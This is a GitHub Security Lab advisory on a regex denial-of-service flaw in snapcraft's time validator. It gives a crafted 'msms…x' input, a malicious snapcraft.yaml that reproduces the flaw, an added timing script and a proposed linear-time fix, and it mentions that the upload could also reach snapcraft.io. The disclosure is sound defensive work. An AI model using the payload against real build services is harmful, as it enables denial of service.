Coordinated Disclosure Timeline
- 2024-11-04: Report filed on launchpad
- 2025-01-09: Asked for an update
- 2025-01-20: No response, so created a public pull request to fix the bug: https://github.com/canonical/snapcraft/pull/5210
Summary
A snap with a crafted yaml file can cause a denial of service in snapcraft.
Project
snapcraft
Tested Version
Details
ReDoS in _validate_time (GHSL-2024-323)
_validate_time uses a regex to check that time values in a snap's yaml file are formatted correctly:
    @pydantic.field_validator(
        "start_timeout", "stop_timeout", "watchdog_timeout", "restart_delay"
    )
    @classmethod
    def _validate_time(cls, timeval):
        if not re.match(r"^[0-9]+(ns|us|ms|s|m)*$", timeval):
            raise ValueError(f"{timeval!r} is not a valid time value")
        return timeval
For example, 10s or 10ms are both valid times. But the regex has a ReDoS vulnerability, which means that it runs very slowly on invalid inputs like this:
0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx
To reproduce the ReDoS with snapcraft, first create an empty snap by running this command:
snapcraft init
Then replace the contents of ./snap/snapcraft.yaml with this text:
name: GHSL-2024-323
base: core24
apps:
  GHSL-2024-323:
    command: /bin/echo kevwozere
    restart-delay: 0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx
Now run the following command and observe that it takes a long time to finish:
snapcraft
The running time increases exponentially with the length of the invalid string.
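As an added illustration (not code from the advisory, from snapcraft, or from the linked pull request), the script below times the quoted regex on short versions of the payload so the doubling is visible, and pairs it with a backtracking-free rewrite that accepts exactly the same strings. The hardened pattern is my own suggestion, not the upstream fix; the sample inputs are constructed.

```python
import re
import time

# The regex from snapcraft's _validate_time, quoted from the advisory above.
# (ns|us|ms|s|m)* is ambiguous: "ms" can be consumed as "ms" or as "m" then "s",
# so a tail that cannot match forces the engine to try every split (2**n of them).
VULNERABLE_RE = re.compile(r"^[0-9]+(ns|us|ms|s|m)*$")

# Hardened rewrite (my assumption, not the upstream fix). Any concatenation of
# "ns", "us", "ms", "s", "m" is exactly a string over n/u/m/s in which every n or u
# is immediately followed by s, and that is what (?:[nu]s|[ms])* accepts. The two
# alternatives start with disjoint characters, so there is only one way to match
# each position and the check runs in time linear in the input length.
SAFE_RE = re.compile(r"^[0-9]+(?:[nu]s|[ms])*$")


def naive_is_valid_time(timeval: str) -> bool:
    """The original check; exponential on inputs such as '0' + 'ms' * n + 'x'."""
    return VULNERABLE_RE.match(timeval) is not None


def safe_is_valid_time(timeval: str) -> bool:
    """Same accepted language as naive_is_valid_time, linear time."""
    return SAFE_RE.match(timeval) is not None


def redos_input(n: int) -> str:
    """Payload of the shape used in the advisory: digits, n copies of 'ms', then 'x'."""
    return "0" + "ms" * n + "x"


def time_check(func, timeval: str) -> float:
    """Seconds spent in a single call of func(timeval)."""
    start = time.perf_counter()
    func(timeval)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Constructed samples: both validators must agree on valid and invalid values.
    for sample in ["10s", "10ms", "5m", "100ns", "7us", "10msms", "abc", "10x", "10n"]:
        assert naive_is_valid_time(sample) == safe_is_valid_time(sample), sample
    # Each extra "ms" roughly doubles the vulnerable check; the safe one stays flat.
    for n in (10, 12, 14, 16):
        payload = redos_input(n)
        print(f"n={n:2d} vulnerable={time_check(naive_is_valid_time, payload):.4f}s"
              f" safe={time_check(safe_is_valid_time, payload):.6f}s")
    # The advisory's 28-repetition payload is only fed to the safe pattern here.
    assert not safe_is_valid_time(redos_input(28))
```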
This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.
Impact
This issue may lead to denial of service. We have only tested our PoC locally, but it may also be possible to trigger a denial of service on https://snapcraft.io/ by uploading a malicious snap.
Credit
This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-323 in any communication regarding this issue.